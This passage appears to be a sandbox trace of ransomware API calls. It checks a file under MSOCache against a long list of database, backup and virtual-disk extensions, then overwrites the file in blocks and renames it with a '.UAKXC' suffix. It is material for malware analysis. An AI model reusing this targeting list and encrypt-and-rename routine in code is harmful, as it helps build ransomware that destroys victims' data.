(lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dxl") returned 0x0 [0158.136] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".eco") returned 0x0 [0158.136] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".ecx") returned 0x0 [0158.136] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".edb") returned 0x0 [0158.136] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".epim") returned 0x0 [0158.136] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".exb") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".fcd") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".fdb") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".fic") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".fmp") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".fmp12") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".fmpsl") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".fol") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".fp3") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".fp4") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".fp5") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".fp7") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".fpt") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".frm") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".gdb") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".grdb") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".gwi") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".hdb") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".his") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".ib") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".idb") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".ihx") returned 0x0 [0158.137] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".itdb") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".itw") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".jet") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".jtx") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".kdb") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".kexi") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".kexic") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".kexis") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".lgc") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".lwx") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".maf") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".maq") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".mar") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".mas") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".mav") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".mdb") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".mdf") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".mpd") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".mrg") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".mud") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".mwb") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".myd") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".ndf") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".nnt") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".nrmlib") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".ns2") returned 0x0 [0158.138] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".ns3") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".ns4") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".nsf") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".nv") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".nv2") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".nwdb") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".nyf") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".odb") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".oqy") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".orx") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".owc") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".p96") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".p97") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".pan") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".pdb") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".pdm") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".pnz") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".qry") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".qvd") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".rbf") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".rctd") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".rod") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".rodx") returned 0x0 [0158.139] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".rpd") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".rsd") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".sas7bdat") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".sbf") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".scx") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".sdb") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".sdc") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".sdf") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".sis") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".spq") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".sql") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".sqlite") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".sqlite3") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".sqlitedb") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".te") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".temx") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".tmd") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".tps") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".trc") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".trm") returned 0x0 [0158.140] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".udb") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".udl") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".usr") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".v12") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".vis") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".vpd") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".vvv") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".wdb") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".wmdb") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".wrk") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".xdb") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".xld") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".xmlff") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".abcddb") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".abs") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".abx") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".accdw") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".adn") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".db2") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".fm5") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".hjt") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".icg") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".icr") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".kdb") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".lut") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".maw") returned 0x0 [0158.141] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".mdn") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".mdt") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".vdi") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".vhd") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".vmdk") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".pvm") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".vmem") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".vmsn") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".vmsd") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".nvram") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".vmx") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".raw") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".qcow2") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".subvol") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".bin") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".vsv") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".avhd") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".vmrs") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".vhdx") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".avdx") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".vmcx") returned 0x0 [0158.142] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".iso") returned 0x0 [0158.142] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.143] WriteFile (in: hFile=0x6ec, lpBuffer=0x373fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x373fc78, lpOverlapped=0x0 | out: lpBuffer=0x373fd70*, lpNumberOfBytesWritten=0x373fc78*=0x20c, lpOverlapped=0x0) returned 1 [0158.145] WriteFile (in: hFile=0x6ec, lpBuffer=0x373fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x373fc7c, lpOverlapped=0x0 | out: lpBuffer=0x373fc80*, lpNumberOfBytesWritten=0x373fc7c*=0xa, lpOverlapped=0x0) returned 1 [0158.145] SetEndOfFile (hFile=0x6ec) returned 1 [0158.145] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.145] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x373fcc8, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fcc8*=0x100000, lpOverlapped=0x0) returned 1 [0158.171] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.171] WriteFile (in: hFile=0x6ec, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x373fc8c, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc8c*=0x100000, lpOverlapped=0x0) returned 1 [0158.175] CloseHandle (hObject=0x6ec) returned 1 [0158.238] GetProcessHeap () returned 0xea0000 [0158.238] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0158.238] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" [0158.238] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.UAKXC" [0158.238] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.uakxc")) returned 1 [0158.239] GetProcessHeap () returned 0xea0000 [0158.239] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0158.239] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5f50 | out: hHeap=0xea0000) returned 1 [0158.239] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c68 | out: hHeap=0xea0000) returned 1 